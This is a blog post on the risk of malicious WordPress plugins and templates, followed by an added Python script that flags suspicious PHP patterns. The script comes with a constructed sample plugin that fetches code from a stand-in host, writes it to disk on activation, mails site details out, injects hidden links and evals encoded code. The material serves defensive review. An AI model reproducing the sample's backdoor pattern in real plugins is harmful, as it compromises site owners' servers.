WordPress security issues - inviting the hackers in and brewing them a tea

If, like me, you think WordPress is a great CMS, you’ve probably installed several templates and plugins. But do you know what exactly it is you are installing?

Chances are, unless you are a PHP programmer, you won’t have given this a second thought.

So what is it you are installing?
WordPress plugins and some templates contain code that performs a particular task. Some of my favourite plugins are listed here.

So what’s the security issue?
Those plugins and templates could be malicious!

Most of us take precautions when downloading programs and files onto our desktops, but happily install plugins and templates on servers without giving it a second thought. So now you have your nice new shiny template installed, but what else is it doing? The possibilities are endless: you could be opening your server up to sending out spam, or leaving your company server open to attack.

In the last few weeks alone I’ve seen:

  • templates that send out emails when installed
  • plugins inserting hidden links in all your posts
  • mystery encoded PHP in templates
  • plugins that install extra PHP files from remote servers

So what can you do?
Until there is an online system where plugins and templates are checked for security holes, and we’re able to download them from a verified source, all we can do is be very careful. Before installing, look through those template and plugin files and check for suspicious code.
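As an added example (not code from the original post), here is a small Python script that reads through a plugin or theme's PHP files and flags the four behaviours listed above: mail sent from an activation hook, remote fetches and file writes, hidden links injected through a content filter, and encoded code handed to eval. The sample plugin text is constructed; the rules are heuristics that mark lines for a human to read, not a verdict on the plugin.

```python
import re
from pathlib import Path

# Heuristic rules for the patterns the post describes. A hit is a lead for
# manual review, not proof of malice: plenty of honest plugins send mail.
SUSPICIOUS = {
    "encoded/obfuscated code": re.compile(r"\b(eval|base64_decode|gzinflate|str_rot13)\s*\("),
    "preg_replace /e (code execution)": re.compile(r"""preg_replace\s*\(\s*['"]/[^'"]*/[a-zA-Z]*e[a-zA-Z]*['"]"""),
    "remote file fetch": re.compile(r"""\b(file_get_contents|fopen|copy|curl_init)\s*\(\s*['"]https?://"""),
    "writes a file to disk": re.compile(r"\b(file_put_contents|fwrite|move_uploaded_file)\s*\("),
    "sends email": re.compile(r"\b(mail|wp_mail)\s*\("),
    "hidden link (display:none)": re.compile(r"display\s*:\s*none[^>]*>\s*<a\s", re.I),
    "content filter (can inject links)": re.compile(r"""add_filter\s*\(\s*['"]the_content['"]"""),
}

def scan_source(text, name="<input>"):
    """Return (file, line_no, reason, line) for every line matching a rule."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        for reason, rx in SUSPICIOUS.items():
            if rx.search(line):
                hits.append((name, n, reason, line.strip()))
    return hits

def scan_tree(root):
    """Scan every .php file under a plugin or theme directory."""
    hits = []
    for p in sorted(Path(root).rglob("*.php")):
        hits.extend(scan_source(p.read_text(errors="replace"), str(p)))
    return hits

# Constructed sample combining the four behaviours listed above; not a real plugin.
SAMPLE_PLUGIN = r"""<?php
register_activation_hook(__FILE__, 'ew_activate');
function ew_activate() {
    mail('owner@example.invalid', 'installed', get_bloginfo('url'));
    $code = file_get_contents('http://example.invalid/extra.txt');
    file_put_contents(dirname(__FILE__) . '/extra.php', $code);
}
add_filter('the_content', 'ew_footer');
function ew_footer($c) {
    return $c . '<div style="display:none"><a href="http://example.invalid">x</a></div>';
}
eval(base64_decode('...'));
"""

if __name__ == "__main__":
    for f, n, reason, line in scan_source(SAMPLE_PLUGIN, "sample.php"):
        print(f"{f}:{n}: {reason}: {line}")
```

Run `scan_tree("wp-content/plugins/some-plugin")` against a freshly unpacked plugin before activating it, and read every flagged line in context.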
